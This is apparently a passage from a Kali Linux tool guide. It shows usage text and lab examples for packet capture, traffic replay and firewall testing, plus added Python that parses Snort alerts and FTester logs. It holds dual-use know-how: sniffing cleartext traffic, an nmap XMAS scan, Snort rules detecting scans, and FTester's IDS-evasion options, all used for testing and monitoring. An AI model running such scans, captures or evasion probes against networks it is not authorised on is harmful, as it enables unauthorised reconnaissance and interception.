-g: output each flow in alternating colors (note change!)
-l: treat non-flag arguments as input files rather than a pcap expression
-L semlock - specifies that writes are locked using a named semaphore
-p: don't use promiscuous mode
-q: quiet mode - do not print warnings
-r file : read packets from tcpdump pcap file (may be repeated)
-R file : read packets from tcpdump pcap file TO FINISH CONNECTIONS
-v : verbose operation equivalent to -d 10
-V : print version number and exit
-w file : write packets not processed to file
-o outdir : specify output directory (default '.')
-X filename : DFXML output to filename
-m bytes : specifies skip that starts a new stream (default 16777216).
-F{p} : filename prefix/suffix (-hh for options)
-T{t} : filename template (-hh for options; default %A.%a-%B.%b%V%v%C%c)
-Z do not decompress gzip-compressed HTTP transactions
-K: output|keep pcap flow structure.
Security:
-U user relinquish privleges and become user (if running as root)
-z dir chroot to dir (requires that -U be used).
Control of Scanners:
-E scanner - turn off all scanners except scanner
-S name=value Set a configuration parameter (-hh for info)
Console output options:
-B: binary output, even with -c or -C (normally -c or -C turn it off)
-c: console print only (don't create files)
-C: console print only, but without the display of source/dest header
-0: don't print newlines after packets when printing to console
-s: strip non-printable characters (change to '.')
-J: output json format.
-D: output in hex (useful to combine with -c or -C)
■ Example
# Send an HTTP request
root@kali:~# curl http://example.com -4
# Capture packets with tcpflow
root@kali:~# tcpflow -c -i eth0 -T'%T %N %A:%a > %B:%b'
# DNS queries (UDP) are not displayed because they are not structured as a continuous stream
2024-11-22T02:38:19Z 000 192.168.011.003:57610 > 093.184.215.014:00080: GET / HTTP/1.1
Host: example.com
User-Agent: curl/8.9.1
Accept: */*
2024-11-22T02:38:19Z 001 093.184.215.014:00080 > 192.168.011.003:57610: HTTP/1.1 200 OK
Age: 28449
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Fri, 22 Nov 2024 02:38:20 GMT
Etag: "3147526947+ident"
Expires: Fri, 29 Nov 2024 02:38:20 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Server: ECAcc (sac/2579)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 1256
<!doctype html>
[...]
# Capture packets with tcpdump
root@kali:~# tcpdump -A -n -i eth0
02:41:21.872347 IP 192.168.11.3.34219 > 192.168.11.1.53: 31532+ A? example.com. (29)
E..9d.@.@.(,......A....5.%..{,...........example.com.....
02:41:21.873757 IP 192.168.65.7.53 > 192.168.11.3.34219: 31532 1/0/0 A 93.184.215.14 (56)
E..TRe@.?.;o..A......5...@..{,...........example.com......example.com...........]...
02:41:21.874414 IP 192.168.11.3.54382 > 93.184.215.14.80: Flags [S], seq 2964243918, win 64240, options [mss 1460,sackOK,TS val 1596352808 ecr 0,nop,wscale 7], length 0
E..<..@.@..0....]....n.P.............
.........
_&i(........
02:41:22.002762 IP 93.184.215.14.80 > 192.168.11.3.54382: Flags [S.], seq 2795602936, ack 2964243919, win 29184, options [mss 1460,nop,nop,TS val 2851310283 ecr 1596352808,nop,wscale 7], length 0
E..<|p..?..p]........P.n..........r../.........
...._&i(....
02:41:22.002897 IP 192.168.11.3.54382 > 93.184.215.14.80: Flags [.], ack 1, win 502, options [nop,nop,TS val 1596352936 ecr 2851310283], length 0
E..4..@.@..7....]....n.P...................
_&i.....
02:41:22.003071 IP 192.168.11.3.54382 > 93.184.215.14.80: Flags [P.], seq 1:75, ack 1, win 502, options [nop,nop,TS val 1596352936 ecr 2851310283], length 74: HTTP: GET / HTTP/1.1
E..~..@.@.......]....n.P.............L.....
_&i.....GET / HTTP/1.1
Host: example.com
User-Agent: curl/8.9.1
Accept: */*
[...]
tcpick
A packet capture tool. It reconstructs and reorders data streams and displays them.
■ Usage
root@kali:~# man tcpick
SYNOPSIS
tcpick [ -a ] [ -n ] [ -C ]
[ -e count ]
[ -i interface | -r file ]
[ -X timeout ]
[ -D ] [ -F1 | -F2 ]
[ -yH | -yP | -yR | -yU | -yx | -yX ]
[ -bH | -bP | -bR | -bU | -bx | -bX ]
[ -wH[ub] | -wP[ub] | -wR[ub] | -wU[ub] ]
[ -v [ verbosity ]] [ -S ] [ -h ]
[ --separator ]
[ -T | -Tf [ number ]]
[ -E | -Ef [ number ]]
[ -Pc | -Ps ]
[ "filter" ]
[ --help ] [ --version ]
BASE OPTIONS
-i --interface interface
listen on selected interface, (i.e. ppp0 or eth0). If option -i is omitted, tcpick is able to select the first open interface
(usually a ethernet card).
-r --readfile
reads raw packets from a file written with tcpdump -w instead of using a network device.
"filter"
This is the filter for the capturer engine. You can set it in the same way of setting the tcpdump(1) filter. Read tcpdump(1) manpage for other explanations.
-a Displays host names instead of ip addresses. Warning: for every new ip grabbed a dns query will be generated! Use it carefully on
high-traffic network devices!
-C --colors
Uses terminal colors: very nice! It should help you to read the output of tcpick
-D number --dirs number
Create directories to store sniffed sessions. When a directory contains number sessions, a new one will be created.
-e count
Exits when count packets have been sniffed
-E number
Exit when number sniffed connections are detected as "CLOSED"
-Ef number
Exit when the first number connections are detected as "CLOSED"
-F1 -F2 --filenaming 1|2
Choose the filenaming system.
-F1 : tcpick_clientip_serverip.side.dat
(side means clnt, serv or both)
-F2 : tcpick_connectionnumber_clientip_serverip.side.dat
-h Shows source and destination ip and port; shows tcp flags as letters.
--help Displays a short help summary
-p Don't put the network interface in promiscuous mode. Note that the interface might be in promiscuous mode for some other
reason.
-S Suppresses the "status of the connection" banner.
--separator
Add a separator for the payloads displayed.
-t Adds timestamp in hour:minutes:seconds:microseconds format
-td Like -t with date timestamp in day-month-year format
-T number
Track number connections. It could be very useful on a high-traffic network device. If number is not specified, it will be set
to 1.
-Tf number
Track only the first number connections; the following will be discarded. If number is not specified, it will be set to 1.
-v verbosity
Quite useless, yet. Set verbosity level. Actually there are not really many extra messages to display, this means it is enabled
by default (-v1). Set verbosity level to 0 to suppress extra messages (-v0) except error messages. Set verbosity level to 5 to
display debug messages (-v5). There are not other verbosity levels.
-X timeout
Connections are considered EXPIRED when there is no traffic for at least timeout seconds. Default is 600.
--version
Displays the tcpick version
DISPLAY THE DATA IN THE TCP PACKETS
These options are prefixed by -y and are useful to display in various ways the content of the packet sniffed (the data, called payload),
once it arrives at the listening interface. In that way the tcp duplicates will be not discarded and the packets will not be reordered,
but displayed "as is". If you want a fully acknowledged stream, see the -w and -b set of options.
-yH View data in hexadecimal-spaced mode (for the hexdump see -yx and -yX options.
-yP Shows data contained in the tcp packets. Non-printable characters are transformed in dots: ".". Newline character is preserved.
This is the best way, in my opinion to show data like HTTP requests, IRC communication, SMTP stuff and so on.
-yR Displays all kind of characters, printable and non printable. If something binary is transmitted, the effect will probably be
like watching with "cat" at a gzipped file.
-yx Shows all data after the header in hexadecimal dump of 16 bytes per line.
-yX Shows all data after the header in hexadecimal and ascii dump with 16 bytes per line.
-yU Shows all data after the header, but Unprintable characters are displayed as hexadecimal values between a "<" and a ">" symbol.
[...]
■ Example
# Send an HTTP request
root@kali:~# curl http://example.com -4
# Capture packets with tcpick
root@kali:~# tcpick -i eth0 -yP -h
# For DNS queries (UDP), only the packet data is displayed
I............example.com.....
I............example.com......example.com..........]...
192.168.11.3:50238 S > 93.184.215.14:http (0)
1 SYN-SENT 192.168.11.3:50238 > 93.184.215.14:http
93.184.215.14:http AS > 192.168.11.3:50238 (0)
1 SYN-RECEIVED 192.168.11.3:50238 > 93.184.215.14:http
192.168.11.3:50238 A > 93.184.215.14:http (0)
1 ESTABLISHED 192.168.11.3:50238 > 93.184.215.14:http
192.168.11.3:50238 AP > 93.184.215.14:http (74)
GET / HTTP/1.1
Host: example.com
User-Agent: curl/8.9.1
Accept: */*
93.184.215.14:http A > 192.168.11.3:50238 (0)
93.184.215.14:http A > 192.168.11.3:50238 (1448)
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 283846
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Fri, 22 Nov 2024 02:46:14 GMT
Etag: "3147526947"
Expires: Fri, 29 Nov 2024 02:46:14 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Server: ECAcc (lac/5586)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 1256
<!doctype html>
[...]
# Capture packets with tcpdump
root@kali:~# tcpdump -A -n -i eth0
02:49:38.069221 IP 192.168.11.3.49553 > 192.168.11.1.53: 18864+ A? example.com. (29)
E..9.r@.@..}......A....5.%..I............example.com.....
02:49:38.075079 IP 192.168.65.7.53 > 192.168.11.3.49553: 18864 1/0/0 A 93.184.215.14 (56)
E..T..@.?. ...A......5...@..I............example.com......example.com........Z..]...
02:49:38.075568 IP 192.168.11.3.50376 > 93.184.215.14.80: Flags [S], seq 3296100245, win 64240, options [mss 1460,sackOK,TS val 1596849039 ecr 0,nop,wscale 7], length 0
E..<Oj@.@.
v....]......P.v...........
.........
_-..........
02:49:38.210142 IP 93.184.215.14.80 > 192.168.11.3.50376: Flags [S.], seq 1774560246, ack 3296100246, win 29184, options [mss 1460,nop,nop,TS val 2851806492 ecr 1596849039,nop,wscale 7], length 0
E..<g...?.3.]........P..i....v....r..].........
...._-......
02:49:38.210279 IP 192.168.11.3.50376 > 93.184.215.14.80: Flags [.], ack 1, win 502, options [nop,nop,TS val 1596849174 ecr 2851806492], length 0
E..4Ok@.@.
}....]......P.v..i..............
_-......
02:49:38.210511 IP 192.168.11.3.50376 > 93.184.215.14.80: Flags [P.], seq 1:75, ack 1, win 502, options [nop,nop,TS val 1596849174 ecr 2851806492], length 74: HTTP: GET / HTTP/1.1
Tcpreplay
Replays traffic traced with tcpdump.
■ Usage
root@kali:~# tcpreplay --help
Usage: tcpreplay [ -<flag> [<val>] | --<name>[{=| }<val>] ]... \
<pcap_file(s)> | <pcap_dir(s)>
-d, --dbug=num Enable debugging output
- it must be in the range:
0 to 5
-q, --quiet Quiet mode
-T, --timer=str Select packet timing mode: select, ioport, gtod, nano
--maxsleep=num Sleep for no more then X milliseconds between packets
-v, --verbose Print decoded packets via tcpdump to STDOUT
-A, --decode=str Arguments passed to tcpdump decoder
- requires the option 'verbose'
-K, --preload-pcap Preloads packets into RAM before sending
-c, --cachefile=str Split traffic via a tcpprep cache file
- requires the option 'intf2'
-- and prohibits the option 'dualfile'
-2, --dualfile Replay two files at a time from a network tap
- requires the option 'intf2'
-- and prohibits the option 'cachefile'
-i, --intf1=str Client to server/RX/primary traffic output interface
-I, --intf2=str Server to client/TX/secondary traffic output interface
-w, --write=str Pcap file to receive traffic outputs
- prohibits the option 'intf2'
- an alternate for 'intf1'
--include=str Send only selected packet numbers
- prohibits the option 'exclude'
--exclude=str Send all but selected packet numbers
- prohibits the option 'include'
--listnics List available network interfaces and exit
-l, --loop=num Loop through the capture file X times
- it must be in the range:
greater than or equal to 0
--loopdelay-ms=num Delay between loops in milliseconds
- requires the option 'loop'
-- and prohibits the option 'loopdelay-ns'
- it must be in the range:
greater than or equal to 0
--loopdelay-ns=num Delay between loops in nanoseconds
- requires the option 'loop'
-- and prohibits the option 'loopdelay-ms'
- it must be in the range:
greater than or equal to 0
--pktlen Override the snaplen and use the actual packet len
-L, --limit=num Limit the number of packets to send
- it must be in the range:
greater than or equal to 1
--duration=num Limit the number of seconds to send
- it must be in the range:
greater than or equal to 1
-x, --multiplier=str Modify replay speed to a given multiple
- prohibits these options:
pps
mbps
oneatatime
topspeed
-p, --pps=str Replay packets at a given packets/sec
- prohibits these options:
multiplier
mbps
oneatatime
topspeed
-M, --mbps=str Replay packets at a given Mbps
- prohibits these options:
multiplier
pps
oneatatime
topspeed
-t, --topspeed Replay packets as fast as possible
- prohibits these options:
mbps
multiplier
pps
oneatatime
-o, --oneatatime Replay one packet at a time for each user input
- prohibits these options:
mbps
pps
multiplier
topspeed
--pps-multi=num Number of packets to send for each time interval
- requires the option 'pps'
- it must be in the range:
greater than or equal to 1
--unique-ip Modify IP addresses each loop iteration to generate unique flows
- requires the option 'loop'
--unique-ip-loops=str Number of times to loop before assigning new unique ip
- requires the option 'unique-ip'
--no-flow-stats Suppress printing and tracking flow count, rates and expirations
--flow-expiry=num Number of inactive seconds before a flow is considered expired
- prohibits the option 'no-flow-stats'
- it must be in the range:
greater than or equal to 0
-P, --pid Print the PID of tcpreplay at startup
--stats=num Print statistics every X seconds, or every loop if '0'
- it must be in the range:
greater than or equal to 0
-W, --suppress-warnings suppress printing warning messages
-V, --version Print version information
-h, --less-help Display less usage information and exit
-H, --help display extended usage information and exit
-!, --more-help extended usage information passed thru pager
--save-opts[=arg] save the option state to a config file
--load-opts=str load options from a config file
- disabled as '--no-load-opts'
- may appear multiple times
■ Example
# Save ingress traffic (a port scan) to a file
root@kali_1:~# tcpdump -i eth0 -w scan.pcap
root@kali_2:~# nmap -sX 192.168.11.3 -p 80
# Save egress traffic (SMTP) to a file
root@kali_1:~# tcpdump -i eth0 -w smtp.pcap
root@kali_1:~# swaks --to user@example.com --server 192.168.11.4
# Create Snort rules
root@kali_1:~# cat > my.rules << EOF
alert tcp any any -> any any (msg:"SCAN nmap XMAS"; flow:stateless; flags:UPF; classtype:attempted-recon; sid:1000001; rev:1;)
alert tcp any any -> any 25 (msg:"Suspicious Email Sending"; content:"RCPT TO"; classtype:policy-violation; sid:1000002; rev:1;)
EOF
# Monitor the loopback interface with Snort
root@kali_1:~# snort -c /etc/snort/snort.lua -A alert_fast -R my.rules -k none -i lo
Loading /etc/snort/snort.lua:
Loading snort_defaults.lua:
[...]
Commencing packet processing
++ [0] lo
# Replay the saved traffic on the loopback interface 5 times
root@kali_1:~# tcpreplay -i lo --loop 5 scan.pcap smtp.pcap
# The alerts detected by the rules are displayed
root@kali_1:~# snort -c /etc/snort/snort.lua -A alert_fast -R my.rules -k none -i lo
[...]
Commencing packet processing
11/23-07:56:16.019475 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46202 -> 192.168.11.3:80
11/23-07:56:16.054914 [**] [1:1000002:1] "Suspicious Email Sending" [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.11.3:53560 -> 192.168.11.4:25
11/23-07:56:16.198196 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46202 -> 192.168.11.3:80
11/23-07:56:16.233648 [**] [1:1000002:1] "Suspicious Email Sending" [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.11.3:53560 -> 192.168.11.4:25
11/23-07:56:16.376947 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46202 -> 192.168.11.3:80
11/23-07:56:16.412419 [**] [1:1000002:1] "Suspicious Email Sending" [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.11.3:53560 -> 192.168.11.4:25
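Added example (not Snort's or tcpreplay's code) for checking the replay run above: it parses the `alert_fast` lines, correlates each alert's SID with the local rules file, and reports flows that fired repeatedly with the identical source port, which is what a `tcpreplay --loop` run produces (the same packets are resent as-is). The rule and alert lines are copied from the page as constructed input; the helper names are this example's own.

```python
"""Correlate Snort alert_fast output with the local rules that produced it."""
import re
from collections import Counter, defaultdict

# Constructed input: the two rules and six alert lines shown on the page.
LOCAL_RULES = '''
alert tcp any any -> any any (msg:"SCAN nmap XMAS"; flow:stateless; flags:UPF; classtype:attempted-recon; sid:1000001; rev:1;)
alert tcp any any -> any 25 (msg:"Suspicious Email Sending"; content:"RCPT TO"; classtype:policy-violation; sid:1000002; rev:1;)
'''

ALERT_LINES = '''
11/23-07:56:16.019475 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46202 -> 192.168.11.3:80
11/23-07:56:16.054914 [**] [1:1000002:1] "Suspicious Email Sending" [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.11.3:53560 -> 192.168.11.4:25
11/23-07:56:16.198196 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46202 -> 192.168.11.3:80
11/23-07:56:16.233648 [**] [1:1000002:1] "Suspicious Email Sending" [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.11.3:53560 -> 192.168.11.4:25
11/23-07:56:16.376947 [**] [1:1000001:1] "SCAN nmap XMAS" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.11.4:46202 -> 192.168.11.3:80
11/23-07:56:16.412419 [**] [1:1000002:1] "Suspicious Email Sending" [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 192.168.11.3:53560 -> 192.168.11.4:25
'''

RULE_RE = re.compile(r'msg:"(?P<msg>[^"]*)".*?sid:(?P<sid>\d+);')
ALERT_RE = re.compile(
    r'^(?P<ts>\S+) \[\*\*\] \[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\] '
    r'"(?P<msg>[^"]*)" \[\*\*\] (?:\[Classification: (?P<cls>[^\]]*)\] )?'
    r'\[Priority: (?P<prio>\d+)\] \{(?P<proto>\w+)\} (?P<src>\S+) -> (?P<dst>\S+)$')


def load_rules(text):
    """Map sid -> msg for every rule line (comments and blank lines skipped)."""
    rules = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE_RE.search(line)
        if m:
            rules[int(m.group("sid"))] = m.group("msg")
    return rules


def split_endpoint(endpoint):
    """'192.168.11.4:46202' -> ('192.168.11.4', 46202); port is None if absent."""
    host, _, port = endpoint.rpartition(":")
    return (host, int(port)) if port else (endpoint, None)


def parse_alert(line):
    """Parse one alert_fast line into a dict, or None if it is not an alert."""
    m = ALERT_RE.match(line.strip())
    if not m:
        return None
    src_ip, src_port = split_endpoint(m.group("src"))
    dst_ip, dst_port = split_endpoint(m.group("dst"))
    return {
        "ts": m.group("ts"), "gid": int(m.group("gid")), "sid": int(m.group("sid")),
        "rev": int(m.group("rev")), "msg": m.group("msg"),
        "classification": m.group("cls"), "priority": int(m.group("prio")),
        "proto": m.group("proto"), "src_ip": src_ip, "src_port": src_port,
        "dst_ip": dst_ip, "dst_port": dst_port,
    }


def summarize(alert_text, rules):
    """Per-SID counts and flow counters; also list SIDs with no rule in the local file."""
    per_sid = defaultdict(lambda: {"msg": None, "priority": None, "count": 0,
                                   "flows": Counter()})
    unknown_sids = set()
    for line in alert_text.splitlines():
        alert = parse_alert(line)
        if alert is None:
            continue
        entry = per_sid[alert["sid"]]
        entry["msg"] = alert["msg"]
        entry["priority"] = alert["priority"]
        entry["count"] += 1
        entry["flows"][(alert["src_ip"], alert["src_port"],
                        alert["dst_ip"], alert["dst_port"])] += 1
        if alert["sid"] not in rules:
            unknown_sids.add(alert["sid"])
    return dict(per_sid), sorted(unknown_sids)


def repeated_flows(summary, min_hits=2):
    """4-tuples that fired at least min_hits times with the same source port.

    tcpreplay resends identical packets each loop, so the replayed alerts
    repeat on the exact same 4-tuple; this separates them from new traffic.
    """
    return {sid: {flow: n for flow, n in entry["flows"].items() if n >= min_hits}
            for sid, entry in summary.items()}


if __name__ == "__main__":
    rules = load_rules(LOCAL_RULES)
    summary, unknown = summarize(ALERT_LINES, rules)
    for sid, entry in sorted(summary.items()):
        print(sid, rules.get(sid, "<no local rule>"), entry["count"], "hits")
    print("repeated flows:", repeated_flows(summary))
```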
TShark
The command-line version of Wireshark, a packet capture tool.
■ Usage
root@kali:~# tshark --help
Usage: tshark [options] ...
Capture interface:
-i <interface>, --interface <interface>
name or idx of interface (def: first non-loopback)
-f <capture filter> packet filter in libpcap filter syntax
-s <snaplen>, --snapshot-length <snaplen>
packet snapshot length (def: appropriate maximum)
-p, --no-promiscuous-mode
don't capture in promiscuous mode
-I, --monitor-mode capture in monitor mode, if available
-B <buffer size>, --buffer-size <buffer size>
size of kernel buffer (def: 2MB)
-y <link type>, --linktype <link type>
link layer type (def: first appropriate)
--time-stamp-type <type> timestamp method for interface
-D, --list-interfaces print list of interfaces and exit
-L, --list-data-link-types
print list of link-layer types of iface and exit
--list-time-stamp-types print list of timestamp types for iface and exit
--update-interval interval between updates with new packets (def: 100ms)
Capture stop conditions:
-c <packet count> stop after n packets (def: infinite)
-a <autostop cond.> ..., --autostop <autostop cond.> ...
duration:NUM - stop after NUM seconds
filesize:NUM - stop this file after NUM KB
files:NUM - stop after NUM files
packets:NUM - stop after NUM packets
Capture output:
-b <ringbuffer opt.> ..., --ring-buffer <ringbuffer opt.>
duration:NUM - switch to next file after NUM secs
filesize:NUM - switch to next file after NUM KB
files:NUM - ringbuffer: replace after NUM files
packets:NUM - switch to next file after NUM packets
interval:NUM - switch to next file when the time is
an exact multiple of NUM secs
printname:FILE - print filename to FILE when written
(can use 'stdout' or 'stderr')
Input file:
-r <infile>, --read-file <infile>
set the filename to read from (or '-' for stdin)
Processing:
-2 perform a two-pass analysis
-M <packet count> perform session auto reset
-R <read filter>, --read-filter <read filter>
packet Read filter in Wireshark display filter syntax
(requires -2)
-Y <display filter>, --display-filter <display filter>
packet displaY filter in Wireshark display filter
syntax
-n disable all name resolutions (def: "mNd" enabled, or
as set in preferences)
-N <name resolve flags> enable specific name resolution(s): "mtndsNvg"
-d <layer_type>==<selector>,<decode_as_protocol> ...
"Decode As", see the man page for details
Example: tcp.port==8888,http
-H <hosts file> read a list of entries from a hosts file, which will
then be written to a capture file. (Implies -W n)
--enable-protocol <proto_name>
enable dissection of proto_name
--disable-protocol <proto_name>
disable dissection of proto_name
--only-protocols <protocols>
Only enable dissection of these protocols, comma
separated. Disable everything else
--disable-all-protocols
Disable dissection of all protocols
--enable-heuristic <short_name>
enable dissection of heuristic protocol
--disable-heuristic <short_name>
disable dissection of heuristic protocol
Output:
-w <outfile|-> write packets to a pcapng-format file named "outfile"
(or '-' for stdout). If the output filename has the
.gz extension, it will be compressed to a gzip archive
--capture-comment <comment>
add a capture file comment, if supported
-C <config profile> start with specified configuration profile
--global-profile use the global profile instead of personal profile
-F <output file type> set the output file type; default is pcapng.
an empty "-F" option will list the file types
-V add output of packet tree (Packet Details)
-O <protocols> Only show packet details of these protocols, comma
separated
-P, --print print packet summary even when writing to a file
-S <separator> the line separator to print between packets
-x add output of hex and ASCII dump (Packet Bytes)
--hexdump <hexoption> add hexdump, set options for data source and ASCII dump
all dump all data sources (-x default)
frames dump only frame data source
ascii include ASCII dump text (-x default)
delimit delimit ASCII dump text with '|' characters
noascii exclude ASCII dump text
help display help for --hexdump and exit
-T pdml|ps|psml|json|jsonraw|ek|tabs|text|fields|?
format of text output (def: text)
-j <protocolfilter> protocols layers filter if -T ek|pdml|json selected
(e.g. "ip ip.flags text", filter does not expand child
nodes, unless child is specified also in the filter)
-J <protocolfilter> top level protocol filter if -T ek|pdml|json selected
(e.g. "http tcp", filter which expands all child nodes)
-e <field> field to print if -Tfields selected (e.g. tcp.port,
_ws.col.info)
this option can be repeated to print multiple fields
-E<fieldsoption>=<value> set options for output when -Tfields selected:
bom=y|n print a UTF-8 BOM
header=y|n switch headers on and off
separator=/t|/s|<char> select tab, space, printable character as separator
occurrence=f|l|a print first, last or all occurrences of each field
aggregator=,|/s|<char> select comma, space, printable character as
aggregator
quote=d|s|n select double, single, no quotes for values
-t (a|ad|adoy|d|dd|e|r|u|ud|udoy)[.[N]]|.[N]
output format of time stamps (def: r: rel. to first)
-u s|hms output format of seconds (def: s: seconds)
-l flush standard output after each packet
(implies --update-interval 0)
-q be more quiet on stdout (e.g. when using statistics)
-Q only log true errors to stderr (quieter than -q)
-g enable group read access on the output file(s)
-W n Save extra information in the file, if supported.
n = write network address resolution information
-X <key>:<value> eXtension options, see the man page for details
-U tap_name PDUs export mode, see the man page for details
-z <statistics> various statistics, see the man page for details
--export-objects <protocol>,<destdir>
save exported objects for a protocol to a directory
named "destdir"
--export-tls-session-keys <keyfile>
export TLS Session Keys to a file named "keyfile"
--color color output text similarly to the Wireshark GUI,
requires a terminal with 24-bit color support
Also supplies color attributes to pdml and psml formats
(Note that attributes are nonstandard)
--no-duplicate-keys If -T json is specified, merge duplicate keys in an object
into a single key with as value a json array containing all
values
--elastic-mapping-filter <protocols> If -G elastic-mapping is specified, put only the
specified protocols within the mapping file
--temp-dir <directory> write temporary files to this directory
(default: /tmp)
--compress <type> compress the output file using the type compression format
Diagnostic output:
--log-level <level> sets the active log level ("critical", "warning", etc.)
--log-fatal <level> sets level to abort the program ("critical" or "warning")
--log-domains <[!]list> comma-separated list of the active log domains
--log-fatal-domains <list>
list of domains that cause the program to abort
--log-debug <[!]list> list of domains with "debug" level
--log-noisy <[!]list> list of domains with "noisy" level
--log-file <path> file to output messages to (in addition to stderr)
Miscellaneous:
-h, --help display this help and exit
-v, --version display version info and exit
-o <name>:<value> ... override preference setting
-K <keytab> keytab file to use for kerberos decryption
-G [report] dump one of several available reports and exit
default report="fields"
use "-G help" for more help
■ Example
# Capture only packets destined for port 53
root@kali:~# tshark -i eth0 -f "dst port 53"
Capturing on 'eth0'
1 0.000000000 192.168.11.3 → 8.8.8.8 DNS 71 Standard query 0x4a50 A example.com
# From a captured packet dump, display only packets destined for port 53
root@kali:~# tshark -r test.pcap -Y udp.dstport==53
1 0.000000000 192.168.11.3 → 8.8.8.8 DNS 71 Standard query 0x95d6 A example.com
# From packets captured in real time, display the host, method and user agent of HTTP requests
root@kali:~# tshark -i eth0 -Y http.request -T fields -e http.host -e http.request.method -e http.user_agent
Capturing on 'eth0'
example.com GET curl/8.11.0
# From a captured packet dump, count the packets per destination port and display the totals
root@kali:~# tshark -r test.pcap -T fields -e tcp.dstport | awk '$1 < 10000' | sort | uniq -c | sort -rn
2057 80
250 22
Network Filtering
FTester
Tests a firewall's filtering policy.
■ Usage
root@kali:~# ftest --help
Usage: ftest [-OPTIONS [-MORE_OPTIONS]] [--] [PROGRAM_ARG1 ...]
Configuration options:
-f <conf_file>
-c <source_ip>:<source_port>:<dest_ip>:<dest_port>:<flags>:<protocol>:<tos>
-v <verbose>
Timing options:
-d <delay, 0.25 = 250 ms>
-s <sleep time, 1 = 1 s>
Evasion options:
-e <evasion method>
-t <ids_ttl>
Connection options:
-r <reset connection>
-F <end connection>
-g <IP fragments number, es. 4|IP fragments size, es. 16b>
-p <TCP segments number, es. 4|TCP segments size, es 6b>
-k <cksum value, es. 60000>
-m <marker>
root@kali:~# ftestd --help
Usage: ftestd [-OPTIONS [-MORE_OPTIONS]] [--] [PROGRAM_ARG1 ...]
Configuration options:
-i <interface>
-g <fragments reassembly>
-m <marker>
-v <verbose>
Connection options:
-c <ttl1:ttl2> (ttl1 setting currently works only on Linux systems)
-m <marker>
■ Example
# Create a test scenario
root@kali_1:~# cat > ftest.conf << EOF
192.168.11.3:12345:192.168.65.3:80:S:TCP:0
192.168.11.3:12345:192.168.65.3:443:S:TCP:0
192.168.11.3:12345:192.168.65.3:20-25:S:TCP:0
stop_signal=192.168.11.3:80:192.168.0.3:12345:AP:TCP
EOF
# A firewall is placed between host 1 and host 2, configured to allow inbound traffic only on ports 22, 80 and 443
# Start the sniffer (ftestd) on host 2
root@kali_2:~# ftestd -i eth0 -v
# Run the packet generator (ftest) from host 1 with the test scenario
root@kali_1:~# ftest -f ftest.conf -v -d 0.01
1 - 192.168.11.3:12345 > 192.168.65.3:80 S TCP 0
2 - 192.168.11.3:12345 > 192.168.65.3:443 S TCP 0
3 - 192.168.11.3:12345 > 192.168.65.3:20 S TCP 0
4 - 192.168.11.3:12345 > 192.168.65.3:21 S TCP 0
5 - 192.168.11.3:12345 > 192.168.65.3:22 S TCP 0
6 - 192.168.11.3:12345 > 192.168.65.3:23 S TCP 0
7 - 192.168.11.3:12345 > 192.168.65.3:24 S TCP 0
8 - 192.168.11.3:12345 > 192.168.65.3:25 S TCP 0
Stop packet => 192.168.11.3:80 > 192.168.0.3:12345 AP TCP
# Compare the packet generator and sniffer logs and create a report
root@kali:~# freport ftest.log ftestd.log
Authorized packets:
-------------------
Modified packets (probably NAT):
--------------------------------
1 - 192.168.11.3:12345 > 192.168.65.3:80 S TCP 0
2 - 192.168.11.3:12345 > 192.168.65.3:443 S TCP 0
5 - 192.168.11.3:12345 > 192.168.65.3:22 S TCP 0
9 - 192.168.11.3:80 > 192.168.0.3:12345 PA TCP
>>>>>>>>
1 - 192.168.0.1:12345 > 192.168.0.3:80 S TCP 0
2 - 192.168.0.1:12345 > 192.168.0.3:443 S TCP 0
5 - 192.168.0.1:12345 > 192.168.0.3:22 S TCP 0
9 - 192.168.11.3:80 > 192.168.0.3:12345 PA TCP 0
Filtered or dropped packets:
----------------------------
3 - 192.168.11.3:12345 > 192.168.65.3:20 S TCP 0
4 - 192.168.11.3:12345 > 192.168.65.3:21 S TCP 0
6 - 192.168.11.3:12345 > 192.168.65.3:23 S TCP 0
7 - 192.168.11.3:12345 > 192.168.65.3:24 S TCP 0
8 - 192.168.11.3:12345 > 192.168.65.3:25 S TCP 0
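Added example (not FTester's own code) that re-derives the freport classification from the two logs above and then checks the outcome against the intended inbound policy (only 22, 80 and 443 allowed): a connection attempt that reached the sniffer on any other port is a policy violation, and an allowed port that was filtered is a misconfiguration. The generator and sniffer lines are copied from the page as constructed input; the function names are this example's own.

```python
"""Classify ftest (generator) vs ftestd (sniffer) packets and verify the policy."""
import re

# Constructed input: the nine generated packets and the four the sniffer saw (page data).
GENERATOR_LOG = """
1 - 192.168.11.3:12345 > 192.168.65.3:80 S TCP 0
2 - 192.168.11.3:12345 > 192.168.65.3:443 S TCP 0
3 - 192.168.11.3:12345 > 192.168.65.3:20 S TCP 0
4 - 192.168.11.3:12345 > 192.168.65.3:21 S TCP 0
5 - 192.168.11.3:12345 > 192.168.65.3:22 S TCP 0
6 - 192.168.11.3:12345 > 192.168.65.3:23 S TCP 0
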